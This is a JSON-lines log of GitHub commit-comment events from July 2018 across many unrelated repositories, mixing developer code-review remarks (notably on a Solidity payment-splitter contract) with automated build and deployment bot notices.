{"id":"7934680588","type":"CommitCommentEvent","actor":{"login":"jIdle"},"repo":{"name":"jIdle/Color-Grid"},"payload":{"comment":{"id":29635209,"position":15,"line":56,"path":"main.lua","commit_id":"b41ea9d41e4a2977789b80fa63a46dcc9f265089","created_at":"2018-07-08T22:07:59Z","updated_at":"2018-07-08T22:07:59Z","author_association":"OWNER","body":"Leftover from a previous change, forgot to combine the if statements into one using OR on last commit."}},"created_at":"2018-07-08T22:07:59Z"}
{"id":"7934680967","type":"CommitCommentEvent","actor":{"login":"lordfriky"},"repo":{"name":"ElijahZAwesome/web-cfw-loader"},"payload":{"comment":{"id":29635210,"position":null,"line":null,"path":null,"commit_id":"9d415cfe54fcac590867d70ca59ec5cd3468f9ef","created_at":"2018-07-08T22:08:17Z","updated_at":"2018-07-08T22:08:17Z","author_association":"NONE","body":"I'll change that in a new PR (with some other improvements)"}},"created_at":"2018-07-08T22:08:17Z"}
{"id":"7934681490","type":"CommitCommentEvent","actor":{"login":"brianteeman"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29635211,"position":null,"line":null,"path":null,"commit_id":"93201c85b82822910e99b594de6d8c5175f4aebc","created_at":"2018-07-08T22:08:44Z","updated_at":"2018-07-08T22:08:44Z","author_association":"CONTRIBUTOR","body":"as it is sr-only you dont need text-white ;)"}},"created_at":"2018-07-08T22:08:44Z"}
{"id":"7934683875","type":"CommitCommentEvent","actor":{"login":"dmoody256"},"repo":{"name":"dmoody256/OpenDoorGL"},"payload":{"comment":{"id":29635216,"position":null,"line":null,"path":null,"commit_id":"b23a3b383b2c890b78176afb417f0159eb4d0c4c","created_at":"2018-07-08T22:10:28Z","updated_at":"2018-07-08T22:10:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://192.168.1.13:8085/spec-logs/1736705/b23a3b383b2c890b78176afb417f0159eb4d0c4c.log?referrer=commit)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[OpenDoorGL](http://192.168.1.13:8085/browse/OP) | [OpenDoorGL](http://192.168.1.13:8085/browse/OP-OP)  | :white_check_mark: [\\#9](http://192.168.1.13:8085/browse/OP-OP-9)\n\n"}},"created_at":"2018-07-08T22:10:28Z"}
{"id":"7934685859","type":"CommitCommentEvent","actor":{"login":"harry1453"},"repo":{"name":"nixops/batm_public"},"payload":{"comment":{"id":29635217,"position":28,"line":28,"path":"server_extensions_extra/src/main/java/com/generalbytes/batm/server/extensions/extra/burstcoin/wallets/burstwallet/TransactionSigner.java","commit_id":"0b98dc0a4ca972bdfc25f33fb6e90555469971b6","created_at":"2018-07-08T22:11:57Z","updated_at":"2018-07-08T22:11:57Z","author_association":"COLLABORATOR","body":"@Brabantian @ac0v @rico666 you guys know this way better than I do - please could you check if this implementation is anywhere near how it should be in order to actually work?"}},"created_at":"2018-07-08T22:11:57Z"}
{"id":"7934686551","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635218,"position":10,"line":7,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:12:26Z","updated_at":"2018-07-08T22:12:26Z","author_association":"NONE","body":"`private` protects the value from being overwritten in child contracts (inheritance details we will cover) but it doesn't protect it from being read ... merely inconveniences observers. \r\n\r\nIt is not necessarily a mistake but different from the way you treat `administrator` at line 5 so I wonder about what you're thinking. "}},"created_at":"2018-07-08T22:12:26Z"}
{"id":"7934688060","type":"CommitCommentEvent","actor":{"login":"dmoody256"},"repo":{"name":"dmoody256/OpenDoorGL"},"payload":{"comment":{"id":29635220,"position":null,"line":null,"path":null,"commit_id":"b23a3b383b2c890b78176afb417f0159eb4d0c4c","created_at":"2018-07-08T22:13:37Z","updated_at":"2018-07-08T22:13:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://192.168.1.13:8085/spec-logs/1736705/b23a3b383b2c890b78176afb417f0159eb4d0c4c.log?referrer=commit)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[OpenDoorGL](http://192.168.1.13:8085/browse/OP) | [OpenDoorGL](http://192.168.1.13:8085/browse/OP-OP)  | :white_check_mark: [\\#11](http://192.168.1.13:8085/browse/OP-OP-11)\n\n"}},"created_at":"2018-07-08T22:13:37Z"}
{"id":"7934688178","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635221,"position":20,"line":16,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:13:43Z","updated_at":"2018-07-08T22:13:43Z","author_association":"NONE","body":"I would remove this because it's pointless to guard read-only functions ... the value is known to all full nodes that process transactions ... therefore trivial to fetch for anyone with the skills to work on such software. Again, merely inconveniencing a determined adversary. "}},"created_at":"2018-07-08T22:13:43Z"}
{"id":"7934689712","type":"CommitCommentEvent","actor":{"login":"dmoody256"},"repo":{"name":"dmoody256/OpenDoorGL"},"payload":{"comment":{"id":29635226,"position":null,"line":null,"path":null,"commit_id":"d206ad8bc79dd3dc5dce2e37a6bac1881e1956ec","created_at":"2018-07-08T22:14:56Z","updated_at":"2018-07-08T22:14:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://192.168.1.13:8085/spec-logs/1736705/d206ad8bc79dd3dc5dce2e37a6bac1881e1956ec.log?referrer=commit)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[OpenDoorGL](http://192.168.1.13:8085/browse/OP) | [OpenDoorGL](http://192.168.1.13:8085/browse/OP-OP)  | :white_check_mark: [\\#12](http://192.168.1.13:8085/browse/OP-OP-12)\n\n"}},"created_at":"2018-07-08T22:14:56Z"}
{"id":"7934690522","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635227,"position":28,"line":21,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:15:31Z","updated_at":"2018-07-08T22:15:31Z","author_association":"NONE","body":"Consider\r\n\r\n```\r\nmodifier onlyAdmin {\r\n  require(msg.sender == administrator);\r\n  _;\r\n}\r\n\r\nfunction protectedExample() onlyAdmin returns(...\r\n```\r\n\r\nIt's a way of re-using the same logic and keeping the function details clear, especially good for guards up front such as this. "}},"created_at":"2018-07-08T22:15:31Z"}
{"id":"7934690943","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635228,"position":42,"line":25,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:15:51Z","updated_at":"2018-07-08T22:15:51Z","author_association":"NONE","body":"It will continue to accept funds even when stopped?"}},"created_at":"2018-07-08T22:15:51Z"}
{"id":"7934691295","type":"CommitCommentEvent","actor":{"login":"natecrow"},"repo":{"name":"natecrow/my-destinations"},"payload":{"comment":{"id":29635230,"position":null,"line":null,"path":null,"commit_id":"17f49b88ed37f2b2b334cdbe83c56d2b696712e0","created_at":"2018-07-08T22:16:06Z","updated_at":"2018-07-08T22:16:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Delete destination list](https://trello.com/c/K8mRfU3O/9-delete-destination-list)"}},"created_at":"2018-07-08T22:16:06Z"}
{"id":"7934693411","type":"CommitCommentEvent","actor":{"login":"velvetsanity"},"repo":{"name":"velvetsanity/roll20-character-sheets"},"payload":{"comment":{"id":29635232,"position":null,"line":null,"path":null,"commit_id":"a640c17b8356d95e6e4f9f21d7bb32cbd10e48d0","created_at":"2018-07-08T22:17:43Z","updated_at":"2018-07-08T22:17:43Z","author_association":"OWNER","body":"Spellcheck/translate"}},"created_at":"2018-07-08T22:17:43Z"}
{"id":"7934693788","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29635233,"position":null,"line":null,"path":null,"commit_id":"4ffc2338eedcc2d03d482c7edc5e0e583d59d7cc","created_at":"2018-07-08T22:18:02Z","updated_at":"2018-07-08T22:18:02Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.206`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/206) :tada:"}},"created_at":"2018-07-08T22:18:02Z"}
{"id":"7934693802","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635234,"position":46,"line":29,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:18:02Z","updated_at":"2018-07-08T22:18:02Z","author_association":"NONE","body":"Big catch ... you are taking the contract's balance and dividing by two. You want the funds passed in with this signle transaction, i.e. `msg.value`. This means you can have millions in the contract for thousands of `balances`. Beware of any logic that ever hinges on the contract balance. It's almost always straying off the path. "}},"created_at":"2018-07-08T22:18:02Z"}
{"id":"7934694460","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29635235,"position":null,"line":null,"path":null,"commit_id":"f67989e48a1ef47a9fb0c1eafab63953f15eb64d","created_at":"2018-07-08T22:18:33Z","updated_at":"2018-07-08T22:18:33Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-10](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-10).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-10-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T22:18:33Z"}
{"id":"7934694682","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635236,"position":54,"line":35,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:18:42Z","updated_at":"2018-07-08T22:18:42Z","author_association":"NONE","body":"Consider\r\n```\r\nfunction withdraw(uint amount) public onlyIfRunning returns(bool success) { ...\r\n```"}},"created_at":"2018-07-08T22:18:42Z"}
{"id":"7934694841","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29635237,"position":null,"line":null,"path":null,"commit_id":"4ffc2338eedcc2d03d482c7edc5e0e583d59d7cc","created_at":"2018-07-08T22:18:50Z","updated_at":"2018-07-08T22:18:50Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.312`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/401548961) :tada:"}},"created_at":"2018-07-08T22:18:50Z"}
{"id":"7934695411","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635238,"position":64,"line":42,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:19:18Z","updated_at":"2018-07-08T22:19:18Z","author_association":"NONE","body":"You should emit events to log every important state change. "}},"created_at":"2018-07-08T22:19:18Z"}
{"id":"7934695604","type":"CommitCommentEvent","actor":{"login":"Vladyslav317"},"repo":{"name":"Vladyslav317/welcome-to-github"},"payload":{"comment":{"id":29635239,"position":null,"line":null,"path":null,"commit_id":"9221ec597fe10ea10d0a58651c2c6bbed42b929d","created_at":"2018-07-08T22:19:28Z","updated_at":"2018-07-08T22:19:28Z","author_association":"OWNER","body":"Hi"}},"created_at":"2018-07-08T22:19:28Z"}
{"id":"7934696583","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635242,"position":42,"line":25,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:20:16Z","updated_at":"2018-07-08T22:20:16Z","author_association":"OWNER","body":"oops. good point! I will fix that."}},"created_at":"2018-07-08T22:20:16Z"}
{"id":"7934697269","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29635245,"position":null,"line":null,"path":null,"commit_id":"44b137ef6f847a49e9b82438443b76b88d6db76a","created_at":"2018-07-08T22:20:45Z","updated_at":"2018-07-08T22:20:45Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-12](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-12-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T22:20:45Z"}
{"id":"7934697340","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635246,"position":70,"line":47,"path":"contracts/Splitter.sol","commit_id":"f31bf35fbe30f8541526531d4ec3533e866e3c55","created_at":"2018-07-08T22:20:49Z","updated_at":"2018-07-08T22:20:49Z","author_association":"NONE","body":"There is a default fallback is not payable and will revert but it has been known to change from time to time as the Solidity team adjusts the details of the compiler, so this explicit form is a reasonable cautionary step in case the source is compiled with a future version of the compiler with unexpected \"features\". "}},"created_at":"2018-07-08T22:20:49Z"}
{"id":"7934708592","type":"CommitCommentEvent","actor":{"login":"Ghifari160"},"repo":{"name":"Ghifari160/Tally"},"payload":{"comment":{"id":29635269,"position":null,"line":null,"path":null,"commit_id":"737bdad1aca9413b392b38cf94007dca0ffdfb8d","created_at":"2018-07-08T22:29:26Z","updated_at":"2018-07-08T22:29:26Z","author_association":"OWNER","body":"Additional commit message:\r\n\r\n``` COMMIT_MSG\r\nAdd error codes:\r\n- CORE_IAM_ERROR::ERROR_GET_EMAIL\r\n- CORE_IAM_ERROR::ERROR_GET_EMAILS\r\n- CORE_IAM_ERROR::ERROR_GET_USER_DBOPS\r\n- CORE_IAM_ERROR::ERROR_GET_USER_EMAILS\r\n- CORE_IAM_ERROR::ERROR_INVALID_INPUT\r\n```"}},"created_at":"2018-07-08T22:29:26Z"}
{"id":"7934708683","type":"CommitCommentEvent","actor":{"login":"aledgriffiths79"},"repo":{"name":"aledgriffiths79/band"},"payload":{"comment":{"id":29635270,"position":null,"line":null,"path":null,"commit_id":"7a7c4afb132a687cad4a15e265ed8bdf3704be3e","created_at":"2018-07-08T22:29:31Z","updated_at":"2018-07-08T22:29:31Z","author_association":"OWNER","body":"![images](https://user-images.githubusercontent.com/38667688/42424599-c199cfde-8306-11e8-843f-3d83c26eab7c.jpg)\r\n"}},"created_at":"2018-07-08T22:29:31Z"}
{"id":"7934708773","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/libcomcat-feedstock"},"payload":{"comment":{"id":29635271,"position":null,"line":null,"path":null,"commit_id":"b8b9f8cf3a3fd817668d3567d56688548350003e","created_at":"2018-07-08T22:29:34Z","updated_at":"2018-07-08T22:29:34Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @emthompson-usgs were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @emthompson-usgs were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-08T22:29:34Z"}
{"id":"7934711045","type":"CommitCommentEvent","actor":{"login":"ProditorMagnus"},"repo":{"name":"inferno8/wesnoth-Era_of_Magic"},"payload":{"comment":{"id":29635274,"position":null,"line":null,"path":null,"commit_id":"44a622d3c333514ca77b79b1fea637ab549f925d","created_at":"2018-07-08T22:31:09Z","updated_at":"2018-07-08T22:31:09Z","author_association":"COLLABORATOR","body":"It is strange that this was needed since last commit on this file was also wmlindent."}},"created_at":"2018-07-08T22:31:09Z"}
{"id":"7934717838","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29635283,"position":null,"line":null,"path":null,"commit_id":"307a86a651051074f487818cf3d9f64c9bdbd4a8","created_at":"2018-07-08T22:36:15Z","updated_at":"2018-07-08T22:36:15Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-08T22:36:15Z"}
{"id":"7934718572","type":"CommitCommentEvent","actor":{"login":"jbednar"},"repo":{"name":"pyviz/nbsite"},"payload":{"comment":{"id":29635284,"position":null,"line":null,"path":null,"commit_id":"2b1eb7f5d983a491aad575c6f0afe6aadf34ad98","created_at":"2018-07-08T22:36:49Z","updated_at":"2018-07-08T22:36:49Z","author_association":"CONTRIBUTOR","body":"Ok, then the right fix is not to revert it but to move that line down into the release tag section. No biggie..."}},"created_at":"2018-07-08T22:36:49Z"}
{"id":"7934719202","type":"CommitCommentEvent","actor":{"login":"bastike"},"repo":{"name":"bastike/photocollage"},"payload":{"comment":{"id":29635285,"position":5,"line":7,"path":"README.md","commit_id":"1a18749f678bdef6337abbe4b6ad21e91284d3ee","created_at":"2018-07-08T22:37:18Z","updated_at":"2018-07-08T22:37:18Z","author_association":"OWNER","body":"old good"}},"created_at":"2018-07-08T22:37:18Z"}
{"id":"7934719747","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29635286,"position":null,"line":null,"path":null,"commit_id":"307a86a651051074f487818cf3d9f64c9bdbd4a8","created_at":"2018-07-08T22:37:42Z","updated_at":"2018-07-08T22:37:42Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-307a86a651051074f487818cf3d9f64c9bdbd4a8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T22:37:42Z"}
{"id":"7934720466","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29635288,"position":null,"line":null,"path":null,"commit_id":"fad21cce3a0b093b324d0c6574b0a40d2bfa5a81","created_at":"2018-07-08T22:38:13Z","updated_at":"2018-07-08T22:38:13Z","author_association":"COLLABORATOR","body":"I will list all the symbols has been **removed**:\r\nIn **SWHS** case:\r\nq | Heat flux | W/m2\r\n\r\nIn **SSP** case:\r\nK_no | Normal Stiffness: residual strength | Pa/m\r\nK_tr | Shear Stiffness: residual strength | Pa/m\r\n\r\nIn **NoPCM** case:\r\nC_L | Specific heat capacity of a liquid | J/(kg⋅°C)\r\nq | Heat flux | W/m2\r\nτ | Dummy variable for integration over time | s\r\n\r\nIn **GamePhysics** case:\r\n\r\nî | Horizontal Unit Vector | m\r\nI_k| Moment of Inertia Of the K-Th Rigid Body | kg⋅m2\r\nJ | Impulse (vector) | N⋅s\r\nĵ | Vertical Unit Vector | m\r\nm_i | Mass Of the I-Th Rigid Body | kg\r\nn | Number of particles in a rigid body\r\nr | Distance | m\r\nrAP | Displacement vector between the centre of mass of rigid body A and contact point P | m\r\nrBP | Displacement vector between the centre of mass of rigid body B and contact point P | m\r\nrkP | Displacement vector between the centre of mass of rigid body k and contact point P | m\r\nt0 | Denotes the initial time | s\r\n\r\nAll symbols above were removed because the automatic collecting didn't catch them and I did manual check. All of them doesn't appear in document.\r\n\r\nThere is only one exception is \"pi\". Pi doesn't have a definition, so it isn't shown up in the list.\r\n\r\n"}},"created_at":"2018-07-08T22:38:13Z"}
{"id":"7934721574","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"Wrye-Code-Collection/wrye-bash"},"payload":{"comment":{"id":29635289,"position":9,"line":30,"path":"Mopy/bash/game/fallout4/records.py","commit_id":"e8b268fae33b1b9cc7ce9f7355a60736f99d7c8d","created_at":"2018-07-08T22:39:07Z","updated_at":"2018-07-08T22:39:07Z","author_association":"MEMBER","body":"@utumno From here I import MelConditions"}},"created_at":"2018-07-08T22:39:07Z"}
{"id":"7934722269","type":"CommitCommentEvent","actor":{"login":"dalex1000"},"repo":{"name":"dalex1000/master"},"payload":{"comment":{"id":29635291,"position":null,"line":null,"path":null,"commit_id":"6d3903a5594848a56530c2b68c77dc1fb1171b31","created_at":"2018-07-08T22:39:40Z","updated_at":"2018-07-08T22:39:40Z","author_association":"OWNER","body":"New project for app development."}},"created_at":"2018-07-08T22:39:40Z"}
{"id":"7934723031","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"Wrye-Code-Collection/wrye-bash"},"payload":{"comment":{"id":29635294,"position":18,"line":37,"path":"Mopy/bash/game/fallout4/records.py","commit_id":"e8b268fae33b1b9cc7ce9f7355a60736f99d7c8d","created_at":"2018-07-08T22:40:14Z","updated_at":"2018-07-08T22:40:14Z","author_association":"MEMBER","body":"@utumno With this import will I get what is in the Fallout 4 constants.py, effectively overwriting what Skyrim is using?"}},"created_at":"2018-07-08T22:40:14Z"}
{"id":"7934724542","type":"CommitCommentEvent","actor":{"login":"satmandu"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29635295,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-08T22:41:26Z","updated_at":"2018-07-08T22:41:26Z","author_association":"NONE","body":"For what it's worth, this change is dependent upon there being an accessible bootcode.bin, since the Pi bootrom loads bootcode.bin into the GPU, which then looks at the value of the RSTS register before powering down and waiting for GPIO wake if RSTS has 0x555 in it.\r\n\r\nMaybe at some point we'll know what the GPU does when it sees that RSTS value to put the Pi on low power mode so that it can be done directly when we want to shut down or halt."}},"created_at":"2018-07-08T22:41:26Z"}
{"id":"7934728033","type":"CommitCommentEvent","actor":{"login":"trevor-patrick"},"repo":{"name":"trevor-patrick/mywebpage"},"payload":{"comment":{"id":29635299,"position":null,"line":null,"path":null,"commit_id":"e18fc27f4620cd27e8f65523eb565691b50cdcbf","created_at":"2018-07-08T22:44:08Z","updated_at":"2018-07-08T22:44:08Z","author_association":"OWNER","body":"Deleting domain name? not sure what i'm doing w/ this commit"}},"created_at":"2018-07-08T22:44:08Z"}
{"id":"7934728518","type":"CommitCommentEvent","actor":{"login":"endiliey"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29635300,"position":null,"line":null,"path":null,"commit_id":"091d86b39e4b8cef51e6e48727101124bb4d8a39","created_at":"2018-07-08T22:44:31Z","updated_at":"2018-07-08T22:44:31Z","author_association":"COLLABORATOR","body":"If you try\r\nhttps://circleci.com/gh/facebook/docusaurus\r\n\r\nIt doesnt work. It has to be https://circleci.com/gh/facebook/Docusaurus :facepalm"}},"created_at":"2018-07-08T22:44:31Z"}
{"id":"7934731876","type":"CommitCommentEvent","actor":{"login":"ulrikpedersen"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":29635308,"position":null,"line":null,"path":null,"commit_id":"6637eaa1a8accf306ce75e49b8beae5b607be2c8","created_at":"2018-07-08T22:47:04Z","updated_at":"2018-07-08T22:47:04Z","author_association":"MEMBER","body":"Hi @prjemian and @MarkRivers \r\n\r\nWhile this is a nice feature it does come with a little gotcha; qsrv is only available in EPICS CPP v4.7.0 - which depends on EPICS Base 3.15. The previous EPICS CPP 4.6.0 *doesn't* have pva2pva (which provides libqsrv) but it also only depends on EPICS base 3.14. \r\n\r\nAs this commit is part of release ADCore 3-3-1, if someone wish to enable PVA then currently EPICS>= R3.15 is required because of qsrv. This should probably feature prominently on the release notes.\r\n\r\nCheers,\r\nUlrik"}},"created_at":"2018-07-08T22:47:04Z"}
{"id":"7934733745","type":"CommitCommentEvent","actor":{"login":"wilsonge"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29635310,"position":null,"line":null,"path":null,"commit_id":"93201c85b82822910e99b594de6d8c5175f4aebc","created_at":"2018-07-08T22:48:29Z","updated_at":"2018-07-08T22:48:29Z","author_association":"CONTRIBUTOR","body":"This was the only one i felt confident enough to do myself xD Thanks!"}},"created_at":"2018-07-08T22:48:29Z"}
{"id":"7934734497","type":"CommitCommentEvent","actor":{"login":"vvs"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":29635311,"position":2064,"line":4748,"path":"lib/lib.dom.d.ts","commit_id":"7a7d04e126fb7c1c6074ef26657eddb0f32e4003","created_at":"2018-07-08T22:49:07Z","updated_at":"2018-07-08T22:49:07Z","author_association":"NONE","body":"See #25510 for the regression report caused by this change."}},"created_at":"2018-07-08T22:49:07Z"}
{"id":"7934741829","type":"CommitCommentEvent","actor":{"login":"michaelmior"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":29635315,"position":14,"line":299,"path":"core/src/main/java/org/apache/calcite/rel/rules/LoptOptimizeJoinRule.java","commit_id":"3fe96727479a2beca3a867bde3b5ae25a601e657","created_at":"2018-07-08T22:55:16Z","updated_at":"2018-07-08T22:55:16Z","author_association":"NONE","body":"Excellent. Thanks for the education :)"}},"created_at":"2018-07-08T22:55:16Z"}
{"id":"7934742461","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29635316,"position":null,"line":null,"path":null,"commit_id":"6438ffa58bf6f0da86ac3a9c6ed81bb099585440","created_at":"2018-07-08T22:55:49Z","updated_at":"2018-07-08T22:55:49Z","author_association":"OWNER","body":"Created multidev environment [tre#pr-2](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#pr-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-2-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T22:55:49Z"}
{"id":"7934743043","type":"CommitCommentEvent","actor":{"login":"Aymangt"},"repo":{"name":"Aymangt/jadwal"},"payload":{"comment":{"id":29635317,"position":null,"line":null,"path":null,"commit_id":"21eec671a7f43f6fe92b8f62696304f5cbba3f5f","created_at":"2018-07-08T22:56:16Z","updated_at":"2018-07-08T22:56:16Z","author_association":"OWNER","body":"*done on footer"}},"created_at":"2018-07-08T22:56:16Z"}
{"id":"7934743758","type":"CommitCommentEvent","actor":{"login":"dartzon"},"repo":{"name":"Wakanda/wakanda-storage"},"payload":{"comment":{"id":29635318,"position":5,"line":29,"path":"test/cpp-tests/CMakeLists.txt","commit_id":"c24f12517a4b887d8f906e83dc9ab9039e567dcf","created_at":"2018-07-08T22:56:50Z","updated_at":"2018-07-08T22:56:50Z","author_association":"CONTRIBUTOR","body":"To avoid having to add a new entry manually each time a new test source file is created, you can write something like:\r\n\r\n```cmake\r\nfile(GLOB_RECURSE tests_SRC ${CMAKE_CURRENT_SOURCE_DIR}/../../src/*.cpp ${CMAKE_CURRENT_SOURCE_DIR}/../../src/*.h)\r\nadd_executable(cpp-tests\r\n ${tests_SRC}\r\n basis.cpp\r\n main.cpp)\r\n```"}},"created_at":"2018-07-08T22:56:50Z"}
{"id":"7934744828","type":"CommitCommentEvent","actor":{"login":"michaelmior"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":29635319,"position":12,"line":104,"path":"core/src/main/java/org/apache/calcite/rel/metadata/JaninoRelMetadataProvider.java","commit_id":"3fe96727479a2beca3a867bde3b5ae25a601e657","created_at":"2018-07-08T22:57:47Z","updated_at":"2018-07-08T22:57:47Z","author_association":"NONE","body":"I'm aware that unchecked is for generics. I was just confused because I didn't see the comment removal and the only related change I saw was the lack of the nonnull annotation. (I missed the comment). Thanks for clarifying."}},"created_at":"2018-07-08T22:57:47Z"}
